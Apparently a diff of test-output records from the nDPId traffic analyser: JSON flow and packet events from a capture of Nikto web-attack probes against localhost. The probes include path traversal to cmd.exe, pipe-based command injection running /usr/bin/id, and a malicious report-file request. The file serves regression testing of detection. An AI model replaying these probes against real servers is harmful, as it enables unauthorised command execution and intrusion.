00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277903,"pkt":"AAAAAAAAAAAAAAAACABFAAEFC5dAAEAGMFp\/AAABfwAAAcd4H5DWdjLSA\/QqXoAYAED++QAAAQEICp1m\/7edZv+3R0VUIC9fdnRpX2Jpbi8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzMwMikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}} +01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277905,"pkt":"AAAAAAAAAAAAAAAACABFAADdGS5AAEAGIut\/AAABfwAAAcd6H5B05SBpiRPNwoAYAED+0QAAAQEICp1m\/7mdZv+5R0VUIC9hbnMucGw\/cD0uLi8uLi8uLi8uLi8uLi91c3IvYmluL2lkfCZibGFoIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277907,"pkt":"AAAAAAAAAAAAAAAACABFAADhaxBAAEAG0QR\/AAABfwAAAcd8H5CT4lJLpEBlJ4AYAED+1QAAAQEICp1m\/7udZv+7R0VUIC9hbnMvYW5zLnBsP3A9Li4vLi4vLi4vLi4vLi4vdXNyL2Jpbi9pZHwmYmxhaCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}} +01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277908,"pkt":"AAAAAAAAAAAAAAAACABFAAEIG05AAEAGIKB\/AAABfwAAAcd+H5BZWCIKm5\/s0oAYAED+\/AAAAQEICp1m\/7ydZv+8R0VUIC9yZXBvcnRzL3J3c2VydmxldD9zZXJ2ZXI9cmVwc2VydityZXBvcnQ9L3RtcC9oYWNrZXIucmRmK2Rlc3R5cGU9Y2FjaGUrZGVzZm9ybWF0PVBERiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzQzNykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}} +01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277909,"pkt":"AAAAAAAAAAAAAAAACABFAAC9phtAAEAGlh1\/AAABfwAAAceAH5B1J59d+HsAr4AYAED+sQAAAQEICp1m\/72dZv+9R0VUIC9vcGVuLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ4KQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277910,"pkt":"AAAAAAAAAAAAAAAACABFAADA+2VAAEAGQNB\/AAABfwAAAceCH5AHKcInz6YgT4AYAED+tAAAAQEICp1m\/76dZv++R0VUIC9meDI5aWQxLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277912,"pkt":"AAAAAAAAAAAAAAAACABFAADAC6pAAEAGMIx\/AAABfwAAAceEH5BX8jLvG2MI1oAYAED+tAAAAQEICp1m\/8CdZv\/AR0VUIC9meDI5aWQyLnR4dCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjQ1MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420277913,"pkt":"AAAAAAAAAAAAAAAACABFAAC4Ym1AAEAG2dB\/AAABfwAAAceGH5BoAlsuZzuA64AYAED+rAAAAQEICp1m\/8GdZv\/BR0VUIC8\/LXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY1MjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 